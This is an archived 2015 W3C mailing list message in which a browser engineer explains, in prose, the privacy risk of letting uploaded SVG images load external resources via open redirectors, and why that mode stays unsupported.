W3C home > Mailing lists > Public > public-fx@w3.org > July to September 2015

SVG image security restrictions

From: Robert O'Callahan <robert@ocallahan.org>
Date: Tue, 15 Sep 2015 11:49:36 +1200
Message-ID: <CAOp6jLZ2fPVJ_Y6SM4sPpKZ5o6C0fOmkX8CAtpFBaq7-SK6Svw@mail.gmail.com>
To: "public-fx@w3.org" <public-fx@w3.org>, www-style <www-style@w3.org>
I don't understand the minutes very well, but heycam says authors want SVG
images that can load external resources for sharing purposes, i.e., the
"animated mode" from here:
https://svgwg.org/specs/integration/#animated-mode

We don't support that mode currently because it can lead to surprising,
privacy-harming behavior for Web sites that allow third-party image uploads
and have open redirectors. Example
1) Web site allows users to upload images of products for sale.
2) Web site also has some kind of open redirect functionality, i.e. some
(maybe totally unrelated) service that accepts URLs containing a URL for
another site, and causes a load to occur of the the contained URL, often by
issuing an HTTP redirect to that URL. These are common.
3) Malicious user uploads an SVG image containing an external reference
with a URL for the open redirector, redirecting to the user's own site.
4) Now whenever someone views the malicious user's image, the malicious
user is notified, contrary to the privacy expectations of the site's users
and operators.

The more general problem is that there's an expectation that image files
are self-contained and cannot trigger loads. "Animated mode" SVG images
would violate that expectation.

We could try to address the open redirect scenario by restricting HTTP
redirects for loads performed by SVG images, but I'm not confident that
restricting HTTP redirects is even enough. For example, what if the Web
site has a service that loads arbitrary third party URLs in an IFRAME? Or
some kind of auto-image-upload service that takes a URL? Even if we somehow
gain confidence that we've blocked all avenues for exploitation, we'd have
made the Web platform even more complicated with additional failure modes.


Rob
-- 
lbir ye,ea yer.tnietoehr  rdn rdsme,anea lurpr  edna e hnysnenh hhe uresyf
toD
selthor  stor  edna  siewaoeodm  or v sstvr  esBa  kbvted,t
rdsme,aoreseoouoto
o l euetiuruewFa  kbn e hnystoivateweh uresyf tulsa rehr  rdm  or rnea
lurpr
.a war hsrer holsa rodvted,t  nenh hneireseoouot.tniesiewaoeivatewt sstvr
esn
Received on Monday, 14 September 2015 23:50:14 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 19:49:54 UTC